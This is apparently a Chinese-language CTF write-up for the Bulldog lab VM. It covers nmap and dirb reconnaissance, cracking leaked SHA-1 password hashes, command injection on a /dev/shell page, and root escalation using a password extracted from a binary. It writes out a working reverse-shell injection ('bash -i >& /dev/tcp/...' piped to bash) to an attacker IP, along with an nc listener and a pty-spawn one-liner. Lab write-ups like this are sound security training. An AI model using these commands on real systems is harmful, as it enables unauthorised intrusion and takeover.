1、信息收集
nmap扫描
nmap -sS 10.9.47.0/24 -T4
详细扫描该IP的端口
nmap -sV -p- 10.9.47.221 -T4
发现http有80和8080两个端口
使用10.9.47.221和10.9.47.221:8080在网页上查看,发现两个网页一样
查看源码什么都没有
2、目录扫描
用dirb扫出了许多关键目录(admin和dev页面)
命令:dirb http://10.9.47.221
关键目录:http://10.9.47.221/dev/shell/
dirb http://10.9.47.221/
http://10.9.47.221/dev/shell/
3、敏感文件查找及网页访问
查看 http://10.9.47.221/admin/
发现登录界面,
查看 http://10.9.47.221/dev/
查看源码发现
4.使用MD5解密,发现只有最后两个成功
nick ddf45997a7e18a25ad5f5cf222da64814dd060d5 bulldog
sarah d8b8dd5e7f000b8dea26ef8428caf38c04466b3e bulldoglover
尝试去http://10.9.47.221/admin/登录
发现两个都没有权限
5、登录管理员账号,并在/dev/shell页面利用命令注入漏洞
查看 http://10.9.47.221/dev/shell/
尝试后发现这些命令都可以使用
6、命令注入和nc反弹shell
命令拼接(ls &&echo ‘bash -i >& /dev/tcp/192.168.245.133/4444 0>&1’|bash
nc反弹shell(kali机监听 nc -lvp 4444)
尝试nc反弹shell
反弹成功
查看该用户id(是个普通用户)
7、权限提升
查找敏感目录
发现home/bulldogadmin/.hiddenadmindirectory目录下有customPermissionApp文件和note文件
查看note文件(没什么用)
查看customPermissionApp
疑似二进制文件(使用strings查看)
猜测可能是密码,应为SUPER、 ulitimate、PASSWORD、youCANTget, 可以把他们连到一起正好是SUPERultimatePASSWORDyouCANTget,H是来混淆的,中间刚好有PASSWORD
尝试直接登录所有用户发现不可以
请教大佬发现,这里有个小技巧,可以用Python调用本地的shell实现,命令如下:python -c ‘import pty; pty.spawn("/bin/bash")’
尝试root登录
成功